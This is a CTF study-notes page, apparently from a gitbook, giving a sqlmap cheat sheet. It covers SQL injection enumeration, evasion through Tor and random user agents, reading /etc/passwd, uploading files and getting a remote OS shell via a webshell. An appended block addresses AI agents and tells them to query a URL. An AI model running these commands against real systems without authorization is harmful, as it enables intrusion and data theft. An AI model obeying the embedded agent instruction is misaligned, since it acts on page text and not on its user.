# sqlmap

## Verbose Level (-v)

* 0: displays critical info only
* 1: displays warning info
* 2: displays debug info
* **3: displays payload used**
* 4: displays HTTP request body
* 5: displays HTTP response headers
* 6: displays HTTP response body

## Database Connection (-d)

Connect to a database with credential:

```shell
sqlmap -d DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/<MySQL/Oracle/Microsoft SQL Server/PostgreSQL>
```

or connect to a database file:

```shell
sqlmap -d DBMS://<SQLite, Microsoft Access, Firebird>
```

## GET (-u)

```shell
sqlmap -u "http://<domain>/vuln.php?id=1" -f --banner --dbs --users
```

## POST (--data)

```shell
sqlmap -u "http://<domain>/vuln.php" --data="id=1" -f --banner --dbs --users
```

## Load Request from a File (-r)

```bash
sqlmap -r <request_from_burp>
```

## Cookie (--cookie)

```shell
sqlmap -u <url> --cookie <cookie>
```

## User-Agent (--user-agent)

The default `User-Agent` header sent by sqlmap is `sqlmap/1.0-dev-xxxxxxx`, but we can specify an `User-Agent` header:

```shell
sqlmap -u <url> --user-agent=<user_agent> -f --banner --dbs --users
```

or set a random user agent:

```shell
sqlmap -u <url> --random-agent -f --banner --dbs --users
```

## Level (--level)

* `--level=1`: default mode
* `--level=2`: adds cookie testing
* `--level=3`: adds User-Agent testing
* `--level=4`: more testing
* `--level=5`: adds Host testing

{% hint style="info" %}
Note that the use of the `-p` switch bypasses the level. This means that by manually setting the parameter to test, you can perform a more accurate, stealthy and in-depth exploitation.
{% endhint %}

## Risk (--risk)

* `--risk=1`: (Default) innocuous injections
* `--risk=2`: Enables heavy time-based injections
* `--risk=3`: Enables OR-based injections -> using them on UPDATE queries would update all the rows in a table

## Proxy (--proxy) and Tor (--tor)

Proxy:

```shell
sqlmap --proxy <proxy> -u <url> -f --banner --dbs --users
```

Tor:

```shell
sqlmap --tor -u <url> -f --banner --dbs --users
```

## Blind SQLi (--string, --not-string)

* Append to `--string` a string which is always present in `True` output page
* Append to `--not-string` a string which is always present in `False` output page

## Privilege Enumeration (--is-dba)

Determine if the current user is the database admin:

```shell
sqlmap -u <url> --is-dba
```

## Download/Upload (--file-read/--file-write/--file-dest)

Download a file:

```shell
sqlmap -u <url> --file-read /etc/passwd
```

Uploads a file:

```shell
sqlmap -u <url> --file-write <local_file> --file-dest <target_machine_directory>
```

## RCE (--os-shell)

The following requirements must be satisfied for `--os-shell` to work:

1. We have write permission
2. Pathnames are default
3. PHP `magic_quotes_gpc` is disabled

```shell
sqlmap -u <url> --os-shell
```

Behind the scene, sqlmap creates an **"upload trojan"** on the target machine and uploads a **webshell** from here.

If the `-d` option is used, sqlmap will use **UDF**. For example:

```bash
sqlmap -d "mysql://<username>:<password>@<ip>:3306/dedecms" --os-shell
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ret2basic.gitbook.io/ctfnote/web/sql-injection-sqli/sqlmap.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.